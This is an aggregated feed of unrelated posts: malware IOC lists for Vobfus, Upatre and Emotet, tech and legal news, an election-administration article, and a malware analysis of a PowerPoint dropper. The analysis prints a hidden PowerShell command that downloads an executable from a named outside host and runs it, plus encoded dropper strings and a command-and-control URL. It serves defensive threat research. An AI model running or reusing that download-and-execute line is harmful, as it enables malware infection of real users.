Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 95[.]181[.]198[.]115
  • 192[.]162[.]244[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • resolver1[.]opendns[.]com
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • myip[.]opendns[.]com
  • www[.]bing[.]com
  • hq92lmdlcdnandwuq[.]com
  • cyanteread[.]com
  • tmencedfur[.]com
Files and or directories created
  • %LocalAppData%\Temp\RESB9BE.tmp
  • %LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP
  • %LocalAppData%\Temp\9DF6.bin
  • %LocalAppData%\Temp\CB8E.bin
  • %LocalAppData%\Temp\3F14.bi1
  • %LocalAppData%\Temp\RESBCAB.tmp
  • %LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP
  • %LocalAppData%\Temp\5mq30dkw.2sp.psm1
  • %LocalAppData%\Temp\jrz15mzo.uwv.ps1
  • %LocalAppData%\Temp\lajoenvy.0.cs
  • %LocalAppData%\Temp\lajoenvy.cmdline
  • %LocalAppData%\Temp\lajoenvy.dll
  • %LocalAppData%\Temp\lajoenvy.err
  • %LocalAppData%\Temp\lajoenvy.out
  • %LocalAppData%\Temp\lajoenvy.tmp
File Hashes
  • 0024d14e96fc79b1f7fd052945424e685843a48b1124f2b19b3a0b00570fb716
  • 004a4d3772f1253ed309ce48cdefb8358c7500b91b7fc1a548dd32af03f8178d
  • 00f9d43bdeb5c30acc9e5594c0ff1bd29b52efdcaa63bb8eba745342c165f856
  • 0169eb0d2386671d1929cf74456a32da1758d8c177b4dadbb5c1998768eee892
  • 016ef438660d7acbe94a229f0680b154bb963bc9dbc56eed7450dab36d486c01
  • 01aa3a5ab9590ff079a13d66f67d40b441ab171d2a6ead0df5453b2d3b55888d
  • 01e4c31f4836784dc4d297c4ba6e8f680216693735339022e11669960b929dcc
  • 020c8eff9905e60c6bba7ff500dd0097b0b3017cfa33712a74ff23062c539520
  • 0326d68f08fc899cd8bb7f1a9c1d7df50bc5b979e0f7d2532904a419ab1b7160
  • 033370dfd1d35bc66ed5abf0e6f6ff214c9e1e25196fef04679f18875b0b683c
  • 0383644a89640bbccf401520a918b54920f038e04ec0b0ae0d5aa53c45c08705
  • 03d315458bfc34d01d2e058b6aa772c7fcd294f3dbcd821f71249675da00d94e
  • 03df086184a6b1b146858ea3cef951dc9c3bf6148a26740a74e2384f5cc4a256
  • 03e17ccdc6dfa104759f6d08c38a1ee96fd9cb161600fb5446b61132e4d9bd3d
  • 04abd09ae808338d64a59fedb49dd5af79599cb9e990c2eab869d1afb25285a1
  • 04ef397e7e52f4c71553f5eb2d4bc1971d2eda8a54eafa5a23aae4700264688d
  • 05a5bbabbab5444214ce70c1190f41ccef8ef3dee786d1821d26a396d8a49eb5
  • 07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2
  • 0879b668fbfac129d1c21076fc5826d46323398a3bcd327e4012be584778a446
  • 095114cf4e2a81c44821a1ad9d4ea632e8cf17cf35a5cabc65813a29bcc41157
  • 0a088fe8df26a9a2cd4330224134e1ea0d249300cbce0eaf11fc6f70b75f21f1
  • 0ad6e9f9cd8e64c8ec265d258407f627fb1a872d13bd9cb577ad5e100633f492
  • 0b438e78bb3fe8bffc8f5f1453f318efe177c97d9e4f0ba7e26969a60671a67e
  • 0b4d5c0751ead190373484f7b4d8f0d7e5de5ade613b888712b92947fc173a6a
  • 0d1b953aa006b38c0140f3a2bacda47a28262d54d5676aeeaf432235e356a5bd

Coverage


Screenshots of Detection

AMP




ThreatGrid




Umbrella



Win.Malware.Vobfus-6747720-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: muehe
Mutexes
  • \BaseNamedObjects\A
  • A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • ns1[.]chopsuwey[.]org
  • ns1[.]chopsuwey[.]biz
  • ns1[.]chopsuwey[.]info
  • ns1[.]chopsuwey[.]com
  • ns1[.]chopsuwey[.]net
Files and or directories created
  • \??\E:\autorun.inf
  • \autorun.inf
  • \??\E:\System Volume Information.exe
  • \System Volume Information.exe
  • \$RECYCLE.BIN.exe
  • \??\E:\$RECYCLE.BIN.exe
  • \Secret.exe
  • \??\E:\Passwords.exe
  • \??\E:\Porn.exe
  • \??\E:\Secret.exe
  • \??\E:\Sexy.exe
  • \??\E:\x.mpeg
  • \Passwords.exe
  • \Porn.exe
  • \Sexy.exe
  • %SystemDrive%\Documents and Settings\Administrator\sauuyi.exe
  • %UserProfile%\muehe.exe
  • \??\E:\RCXFF.tmp
  • \??\E:\muehe.exe
  • \RCXFBD0.tmp
  • \RCXFF.tmp
  • \muehe.exe
File Hashes
  • 010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c
  • 01cdf16c052bd4d6e8f50d0447f0570b6e42727cbb3dcebed6e20766a0599854
  • 02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544
  • 0293926921291e6700eddb633fe22ac136735ace9170e6c502be52039d3e7488
  • 02f72dfcc27501cd1a44b3a0eed9e41831f745fc26d6b7d1526c151c94d58333
  • 0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2
  • 0581546a844cf13d0f0c494c9cda7eb7a71a5dbea4abbd8ddb917fe00665965b
  • 06383e4b2c2a596732f85ce8028c5b1c0a60c82e75bbb75358bcd8498b6b4b03
  • 080d08b5202a6da7052a3256c1863db41121881d75188ad96b9af9ab5932a97e
  • 08293e6522e8888ce18400e0c3d6e6ac1319e80bd99ffd24b8e7845fca091cf5
  • 08c0cc2e37a1fbc8f84c932a7cb2bc9a3d3f78a4ce086c1286cb3d335619f9ff
  • 0b2752012a9e104641af14d60987db12a41d39401ac46584b6e9125ed5d0c198
  • 0bcd28d3d84c7518df94abbb5a8153a345121d1d126fc9dc4624259de02a41ab
  • 0c45087137456380ec673b12d06310d8d753be92a3009bcec94ec4ebc2140bb7
  • 0ceecae1d802f19881b04e6f97af98b5039f2b8ccd538c293d66de93d8d77964
  • 0d9a84172a0f96b340eb3f6bd45ca30dbe6c20180f9dae75cb135d0d8b6ffa38
  • 0db0feea81c1b211fbae852151734fca8fb423102cb953dafb3c188f40491482
  • 0ea8e078ab8b42d97148b488fb1ad7d21972c37fdac7befc7d462ee7be3acb84
  • 0feb943bda713bb872c82a94bceb10acd11a1ec0cd2997236dc17da24b646288
  • 121a6b3a8000948f073e3660ecafb19bf5d204a9d468112575afd15c39222eb1
  • 12fc93e4e1c01ce7e3670138d50aa26e5c3d77f3c42da0dc3bd7bbae57359dc4
  • 133fea888e19e34c7703b38194ec08360ce8d697d7aec79da979a35072adce02
  • 145fe07226fb8eb92f609f16f7044ae5a529433730d285ca7c33b9cff6b86b71
  • 1551de875bb37b13c332d5b67ed64026c477f21bbcc6ad3d50ba8b3b8702ee5f
  • 18ee7ed2c61ee532f9a42d02c3c53b017496071608324361117514bdd3fdcade

Coverage


Screenshots of Detection

AMP





ThreatGrid



Umbrella



Win.Downloader.Upatre-6746951-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]38[.]137[.]100
Domain Names contacted by malware. Does not indicate maliciousness
  • drippingstrawberry[.]com
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe
  • %LocalAppData%\Temp\ffengh.exe
  • hfsrfgs.exe
File Hashes
  • 1b806d44ead6688b22e623a1d50ad910af73b6ebe274901cccff8aabd526e3dd
  • 1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3
  • 2e09c458bc34495f4390b2783d17369a2f809860eb95b95ff914c6610fd42ab0
  • 56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838
  • 61e96310f388db546db48b6b8d81958264647add9f7cc880067cd6f875b5b4f9
  • 64c1bb68e91d30812c0ea2690a4bb15d2788b43ec6c54aa9672de758ee7e5042
  • 71dfc74d26d696f74b65c03c93a9118b9c62e5adfb6c93a5e15d00dcb50d585f
  • 7a305e442718a07f2ddcc7ae9a8983c49be3247c123b06dabcf7d48d3a4bdcde
  • 7da8dd2d31ad4ed61c87b5f44e1d70bcb938d9c5ff9abbc94c8e76cf0b10f379
  • 87071c84cff348e086cb28fcfeec54daf58d728c5fb3aaa26ff4aca42fab4b4f
  • 99230cc2ba171d71a9c5bade432d53bbf1ea78be629f62b90bb73fd71a26e8a4
  • af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999
  • bcdfdc97d2a6f3769902d3bf55b180b4dd9efc74af345cf23a795dbdc9456b51
  • c224d27d7adf2fece2e92d4ed2f62e244e8e5bcaa98c89ade06d40b0112e6bd1
  • d7afe736ed75987b854236b451a4cb6f0642b4e9cc92f3a9a96e2b8535070d05
  • d9d107fed85d142d6a5cb4d40a48b3ddf5c61f97bc502a297f816ac902fa13a6
  • e4eddc3910aca83db9bef4bc4f11006c0ae09a1552a6266adac79dc922ffe90a
  • e6c03bfb271c97063320d079b7ed156b8eae18c75ccf5c25d5ae5cc01df62139
  • f41388706c803a31645f416804995ad881d8ee0e0de0f0c355fb87fc415de211
  • fb75875cdf989e58a80330aa43543b9ab3765fde077174729e2011555cd295d9

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella



Win.Malware.Emotet-6745295-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA
    • Value Name: ObjectName
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM19C
  • PEM52C
  • PEM748
  • PEM43C
  • PEM20C
IP Addresses contacted by malware. Does not indicate maliciousness
  • 187[.]162[.]64[.]157
  • 98[.]144[.]2[.]113
  • 200[.]71[.]62[.]76
  • 82[.]211[.]30[.]202
  • 165[.]255[.]91[.]69
  • 154[.]0[.]171[.]246
  • 110[.]142[.]247[.]110
  • 119[.]59[.]124[.]163
  • 108[.]51[.]20[.]17
  • 197[.]249[.]165[.]27
  • 96[.]242[.]234[.]105
  • 217[.]91[.]43[.]150
  • 66[.]220[.]110[.]56
  • 72[.]67[.]198[.]45
  • 183[.]88[.]1[.]238
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • N/A
File Hashes
  • 0edecb893280c8258b5ee20f17afdbdcd09efdec198ba3f0b9dae3bb3a74c497
  • 11fb93e3b137ff6978fd79fdd634f44f257ee28f9bc5c2965108cb5c49a0d949
  • 313f19bdb8c46b96ac18bca55f53f5c0eb03d2fcececaab47b9339d8f014f7c7
  • 40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f
  • 5df55f78a21cd8457c9432afc8da45c182fad6107e3b6e4f5cf86272b68012b1
  • 70921b45506097595f7d11123c1b5c92aa032332c8a503058b27f32ec85d8df2
  • 73689ce1d669a63bdc781fab63f052fdc22021f7d08d37ed7573d2da7230568e
  • 83b316b9a9f76efcab1e741c8eeb7a0c7a50072c3fde5acd49cb0d28afbe7a23
  • 9edeb5b8ba0b6fd036650f80edf1cdd3c35974fcb8ef5a272b658d3ec1a38035
  • b53fb3cf4ed1d4e62dd0cc9d8e1d482dc1a55dedc3804a097f1b213080bb64c5
  • dab7877de92a3793873fec30c4b2e4a758bd5c3c6a67c8da20bfce7c255031be
  • ea8479d471d38105312f8264f2d93c7dd317d1bfda94f345f74313efffe8fb54
  • eba4704ea3e2a37a2bef98101758cbd2264bf6dcfe36eb930fe36fa32d75838a
  • f2a2d0eda6e21c4273d07aafe190918d96c21db335de4c4872e1eca136920c6b
  • fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9
  • fc5935b12a8d07abcafc613a04d3c6773e088f31b88f78acc7f8ee2d2fc2d529

Coverage


Screenshots of Detection

AMP




ThreatGrid






Microsoft is Testing Ads in Mail App For Windows 10 in Select Markets

Mark Wilson writes: Ads in your inbox. Sounds like something you'd expect from the likes of Google or Yahoo, but Microsoft appears to be about to get in on the act as well. And we're not talking about online ads in your Outlook.com account -- we're talking about ads in the Mail app that's included with Windows 10. A new report says that Microsoft is currently testing ads with Windows Insiders, so it could be just a matter of time before they spread wider. In a support page, spotted first by news outlet Thurrott, Microsoft says, "Consistent with consumer email apps and services like Outlook.com, Gmail, and Yahoo Mail, advertising allows us to provide, support, and improve some of our products. We're always experimenting with new features and experiences. Currently, we have a pilot running in Brazil, Canada, Australia, and India to get user feedback on ads in Mail."

Read more of this story at Slashdot.

UK and EU Draft Withdrawal Agreement

On November 14, 2018, the UK government and the EU agreed upon the text of a draft Withdrawal Agreement in relation to the UK’s impending exit from the European Union on March 29, 2019. The draft Withdrawal Agreement provides for a transition period under which the UK will remain subject to a number of its EU membership obligations, during the period starting when the UK leaves the EU on March 29, 2019 to the end of the transition period on December 31, 2020. The draft Withdrawal Agreement provides the following in relation to data protection law:

  • EU data protection law, including the General Data Protection Regulation (“GDPR”) and the e-Privacy Directive, will continue to apply to personal data of data subjects outside the UK that are (i) processed in the UK in accordance with the GDPR before the end of the transition period on December 31, 2020, and (ii) processed in the UK after the end of the transition period on the basis of the draft Withdrawal Agreement.
  • To the extent that a declaration states that the UK provides an adequate level of protection is issued by the European Commission during the transition period, then EU data protection law (including the GDPR and the e-Privacy Directive) will no longer apply in the UK to personal data of data subjects outside the UK. If, however, such declaration of adequacy ceases to be applicable, the UK commits to ensuring an adequate level of protection for the processing of the relevant personal data that is essentially equivalent to that provided by EU data protection law. Although not explicitly stated in the text of the draft Withdrawal Agreement, this obligation appears to extend beyond the end of the transition period.
  • Notwithstanding the above, Chapter VII of the GDPR, relating to cooperation between supervisory authorities and the consistency mechanism, will not apply in the UK during the transition period. As such, organizations will not be permitted to designate the UK Information Commissioner’s Office (“ICO”) as lead authority for GDPR purposes. In addition, the ICO will, during the transition period, have a significantly limited role in relation to the European Data Protection Board. The ICO will be entitled to attend meetings of the European Data Protection  Board in some cases, but will no longer have voting rights.

In practical terms, assuming that the draft Withdrawal Agreement is adopted in its current form, personal data flows between the EU and the UK will likely continue unrestricted during the transition period, until at least December 31, 2020. The draft Withdrawal Agreement itself does not, however, address the relationship between the UK and the EU after the end of the transition period, which will be subject to whatever final deal, if any, is agreed between the EU and the UK. As the draft Withdrawal Agreement is currently written, however, it appears to contemplate a declaration of adequacy in relation to the UK, which if issued would address transfers of personal data from the EU to the UK after the end of the transition period.  As such, it appears that any immediate threat to personal data transfers between the UK and the EU has been staved off, and transfers are likely to continue unaffected during the transition period.

Before being agreed between the UK and the European Council, the draft Withdrawal Agreement must be approved by the UK Parliament. Following multiple resignations from Theresa May’s government yesterday, it looks increasingly unlikely that the draft Withdrawal Agreement will be approved in its current form. If the draft Withdrawal Agreement is not approved, then there remains the prospect of the UK leaving the EU without any transition period or immediate free trade agreement, or any arrangements in place to protect the free flow of personal data between the EU and UK. If, however, a new draft is proposed and agreed upon before the March deadline, it is possible that some of the non-contentious provisions (which may include those relating to data protection) could be carried over into that new proposal.

Threat Analyst Insights: Discovering the Value of Threat Intelligence From Social Media

Social media, in its simplest form, can be viewed as a networking tool that allows individuals to communicate with anyone across the globe, stay up to date on news and trending topics, and share content (and opinions) with one another. For threat researchers and analysts, however, social media is a little bit more than that — it can also be an additional source of valuable information regarding ongoing (and even future) threats.

Some examples of threat information that can be identified on social media include:

  • Threat actor communication
  • Networking and coordination
  • The sharing of vulnerabilities and exploits
  • User reporting and responses to suspicious cyber activity

Although the observation of such threat information can contribute viable context to an analyst’s research, there are a few challenges that need to be addressed when collecting and using information from social media before it can be transformed into actionable intelligence.

Privacy Rights Versus Security Concerns

Privacy is perhaps the biggest obstacle and area of concern when using social media as a source of cyber threat intelligence.

Opponents of the use of social media in threat intelligence argue that privacy should be upheld regardless of whether the information being collected is from private or public profiles, even though posts that come from public profiles are technically considered open source information.

Interestingly, the privacy policies of social media websites such as Facebook and Twitter only ensure privacy to a certain extent, stating that they uphold the right to access, collect, and share user account information if it is believed that such information or actions support illegal activities or could cause harm to oneself or the public. For those concerned about privacy, the question now becomes, “How often do law enforcement, intelligence communities, and social media officials actually monitor my account to detect such activity, and how much information is actually being collected?”

The answer to this question will vary depending on who is collecting that information. But without some degree of monitoring over social media environments, security is weakened and threat response becomes reactive rather than proactive. Because of this, there will always be a debate regarding whether the desire for privacy outweighs the need for security.

Validity and Reliability

Once the desired information is collected from social media, it is moved through the processing stage of the threat intelligence lifecycle. Before analysis and production, raw data collected from social media will undergo some preparation such as decryption, language translation, cultural context application, data reduction, and bias identification.

Unfortunately, the tools and techniques used during this stage are new and often struggle to meet evidence standards such as producing representative datasets, providing credible interpretation, and validating information to avoid fake data. The failure to meet these standards heightens the risk of producing false positives or false negatives. Additionally, because the nature of social media environments allows users to modify and delete content as they please, information posted and shared on social media should be treated as time sensitive in order to properly assess the reliability of information.

One way in which these challenges can be addressed is through information substantiation. In other words, when threat intelligence is produced from information found on social media, the new intelligence should be cross-referenced with existing intelligence to check for false data, tampered information, analyst biases, and any other possible impurities that may discredit its genuine value.

Is Intelligence Derived From Social Media Valuable?

When the challenges of social media collection are properly addressed to ensure privacy protection, validity, and reliability, the answer is yes — intelligence derived from social media can be extremely valuable. Information collected from social media, like all other information, needs to go through the processing and analysis stages of the threat intelligence lifecycle before yielding actionable results.

Once these stages are complete, the resulting intelligence can be used by decision makers to direct plans for threat prevention, mitigation, and recovery. The use of social media in developing threat intelligence for such decision-making processes is still evolving and as a result, privacy, validity, and reliability challenges are still prevalent. To address these challenges, a basis for regulation, standards, and oversight needs to be established to ensure the misuse of social media in threat intelligence does not occur.

The existence of these challenges does not devalue intelligence derived from social media, but instead suggests that such intelligence is most valuable when used to support pre-existing and ongoing assessments.

To learn more about how threat intelligence can bring value to your security strategy, request a personalized demo.

Krysta Horocofsky

Krysta Horocofsky is an associate cyber threat analyst at Recorded Future.

The post Threat Analyst Insights: Discovering the Value of Threat Intelligence From Social Media appeared first on Recorded Future.

     

Fallout From Election Day Chaos Continues in Indiana’s Porter County

Agents from the FBI walked into an office building in the town of Valparaiso, in Porter County, Indiana, last Thursday. County officials had called them for help.

Two full days after the election, ballots for local races still had not been counted. Final election results weren’t released until early the next morning. The delays have caused alarm among local politicians and angered some voters and poll workers, who are calling on the county clerk to resign. More than a week later, one county council race is still too close to call — hanging on a margin of just 15 votes.

Since last week’s elections, reports have come in that raise concerns about alleged efforts to suppress and or manipulate votes across the country, particularly in places like Georgia and Florida. Accounts from local poll workers and voters on Twitter and in the news indicated a broader national breakdown of an overwhelmed electoral system: polling places that ran out of supplies, lines much too long for the elderly or chronically ill to wait in, malfunctioning machines, and even instances where some machines changed votes from one candidate to another. (President Donald Trump and some other Republican politicians, meanwhile, have amplified unsubstantiated claims of widespread voter fraud.)

But in Porter County, the logistical problems were so bad that local officials felt they needed to call for outside help getting to the bottom of things. And as in many other places, it’s not clear whether the issues were caused by politics, mismanagement, or some messy combination of both.

“My concern was more about the lack of organization, the lack of planning, the lack of communication, quite frankly,” said Vicki Urbanik, a Democratic incumbent who was re-elected as county auditor. “Clearly they dropped the ball on this.”

This year, the county’s three-person election board voted to transfer administration of elections from the Voter Registration Office to the county clerk’s office, mirroring the way other counties in the state run elections. But Urbanik and other Democrats, as well as Republicans, say that the change caused unusual disruptions in voting this year.

“I will say that [in] most counties that I’m aware of in Indiana, the clerk’s office actually does run the elections. But this represented a real change here in Porter County, because the Voter Registration Office always ran the elections,” Urbanik explained.

County Clerk Karen Martin was one of the board’s two Republican members who voted in favor of the transition; the Democrat, J.J. Stankiewicz, opposed it. Martin was Urbanik’s Republican opponent for county auditor this year. None of the board members responded to multiple requests for comment. Reached by phone, a deputy in Martin’s office declined to comment.

Martin was on the election board for eight years, Urbanik said. “So, in some people’s minds, the switch really should not have been that big of a deal, in terms of disruption to the election process.” But, she added, “when the Voter Registration Office ran the elections, we never had the problems that we experienced like we had this year.”

Porter County Clerk and Election Board member Karen Martin. Press conference held at noon Thursday outside the voter registration department on the lower level of the Porter County Administration Center in Valparaiso.

Porter County Clerk Karen Martin at a press conference at the Porter County Administration Center on Nov. 8, 2018 in Valparaiso, Ind.

Photo: Tony V. Martin/Courtesy of Times of Northwest Indiana

At least 13 polls in Porter County did not open until between one and two hours after the slated 6 a.m. start — and one poll opened two and a half hours late.

“I do know for a fact the people left,” Urbanik said. Other poll workers independently confirmed this in interviews with The Intercept. A local Republican judge had to issue an order — requested by the county election board and Indiana’s Democratic State Central Committee, and opposed by the state GOP — to keep 12 of those locations open late so voters could make up for the time lost.

On the morning of the election, more than 18,000 absentee and early voter ballots had not yet been sorted for delivery to designated polling places, where they would be tabulated alongside in-person votes. Sheriffs reportedly delivered the missing ballots at 6 a.m., when polls were supposed to open. (Another court order was issued later that day to ensure absentee votes were counted as normal rather than provisional ballots, which are tallied the next day.)

Several voters who requested absentee ballots never received them, Drew Wenger told The Intercept. He chairs the Valparaiso Democratic Committee, which called Tuesday for state police “to investigate any potential wrongdoing connected to the 2018 Porter County election fiasco.” One 85-year-old woman who voted absentee in every election, Wenger said, didn’t receive her ballot for more than two and a half weeks after her initial request. That was only after she inquired in person with the clerk’s office about the delay.

By county law, two inspectors — one from each party — are appointed to monitor polls on each election. But this year, there weren’t enough inspectors, and when polls were supposed to open, several locations still didn’t have their team assembled.

“My husband and I had been contacting Republicans the day before by phone to try and get the gap filled that there weren’t enough Republican inspectors to run the election,” said Candace Shaw, whose husband, Democrat Frank Szczepanski, failed to unseat the local state representative, Ed Soliday, in Indiana’s 4th District. Soliday has himself called for the Indiana secretary of state’s office to investigate what happened in Porter County.

A self-described political junkie, Shaw has been deeply involved in Indiana politics for years, working polls and coordinating poll staffers on Election Day. She offered that growing up, she identified as a Republican and was vice chair of her local young Republicans committee, until she began to study political science in college and re-evaluated her political views. She said most of her family voted for Trump and remains “very, very Republican.” Despite posturing between the state parties on each side, the mishandling of the election isn’t a partisan issue, Shaw said. “I’m friends with a lot of Republicans here in Porter County, and a lot of them are really upset as well about what happened.”

On top of the absence of coordination and communication, poll workers cited myriad technical difficulties. “At 6am the ballot boxers weren’t working. Inspectors were still MIA. We couldn’t open. My stomach sank. I was trying to do something good and now I’d probably be on the local evening news,” poll worker Michelle Senderhauf wrote in a viral thread posted last week on Twitter. She also echoed Shaw’s account, saying that at her polling place, inspectors appointed by each party to monitor voting were not present.

The clerk’s office had also listed the incorrect address for one precinct, and the local newspaper reprinted the error. When voters from that precinct arrived, mistakenly, at Senderhauf’s polling place, workers didn’t have ballots for them. Senderhauf had to call the election hotline for guidance and redirect voters to the correct location.

Senderhauf told The Intercept that lack of training played a major part in the understaffing of precincts. Poll workers didn’t receive training until less than two weeks before election day. “Classes were announced last minute or would only be during the work day. I’m not surprised people refused to show up,” she wrote in an email. “Even though I watched the online training videos and read through the dense state election manual, I didn’t feel confident at all about what I was going to be doing on Election Day. … The incredibly kind and patient woman who was a clerk with me basically gave me on the job training.”

She added that “the state and county have standard procedures, though, and it sure seems that if those procedures had been followed, much of the chaos that day would have been avoided. I can’t help but think that disorganization and ineptitude caused the problems I saw in Porter County on Election Day. I certainly hope it wasn’t done out of malice.”

Other poll workers and county officials interviewed by The Intercept say the problems were not merely a matter of the clerk’s office being unprepared and overwhelmed, and placed the blame squarely on Martin.

Election board member Stankiewicz raised concerns as early as October 31, at a board meeting, that polling locations would not open on time because inspectors had not yet been assigned. “And nothing was done,” Wenger said.

At 1 a.m. the day after the election, the Northwest Indiana Times reported that poll workers were sitting on the floor of the county courthouse counting early and absentee ballots that were delivered late. That situation was avoidable, Shaw argues.

“We did not want to have 18,000 early voters disenfranchised just because of what the clerk chose to do,” Shaw said. “Those are choices that she made.”

The election fiasco has led to calls for Martin to resign. The clerk has been difficult to reach in the days following the election; she was most recently seen hiding behind a voter at an election board briefing, a local affiliate of CBS Chicago reported.

The FBI confirmed that the Porter County Board of Commissioners contacted them regarding the election, but could not comment on any investigation. “The FBI is always willing to accept information, complaints and tips from public officials and community members,” Chris Bavender, public affairs officer for the FBI’s field office in Indianapolis, wrote in an email to The Intercept. “Per DOJ policy I can neither confirm nor deny an investigation.”

Members of the Porter County Board of Commissioners did not respond to multiple requests for comment. The county is set to verify vote totals Friday.

Urbanik, Martin’s challenger, believed that the elections were clearly mismanaged. While she made clear that she did not suspect a deliberate attempt at voter suppression, as a former reporter who observed elections in the county for 25 years, she said it was not out of the question.

“When you look at the polling sites that were not adequately staffed, and that they didn’t open on time, most of them were in one particular area. Which tends to vote Democrat. Not necessarily Democrat, but it tends to be Democrat,” Urbanik told The Intercept in a phone interview.

Shaw called the chaos that ensued in Porter County and elsewhere “completely un-American.”

“It goes against everything that I’ve ever been brought up to believe. Even when I was a Republican, compared to now that I’m a Democrat,” she said. “It’s against everything that we believe about the way that our voting system is supposed to work.”

The post Fallout From Election Day Chaos Continues in Indiana’s Porter County appeared first on The Intercept.

Using Microsoft Powerpoint as Malware Dropper

Marco Ramilli, founder and CEO at cyber security firm Yoroi has explained how to use Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.
The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Microsoft Powerpoint dropper
Stage 1: Microsoft PowerPoint Dropping Website

An external OLEobject (compatibility 2006) was available on that value:

Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″  

Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It’s showed as follows:

Microsoft Powerpoint dropper 2
Stage 2: Executed Javascript

Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.

Microsoft Powerpoint dropper 2

Microsoft Powerpoint dropper 4
Stage 3: .NET file

The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.

Microsoft Powerpoint dropper 5
Microsoft Powerpoint dropper 6
Stage4: AZORult evidence

I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Microsoft Powerpoint, malware)

The post Using Microsoft Powerpoint as Malware Dropper appeared first on Security Affairs.

Security Affairs: Using Microsoft Powerpoint as Malware Dropper

Marco Ramilli, founder and CEO at cyber security firm Yoroi has explained how to use Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.
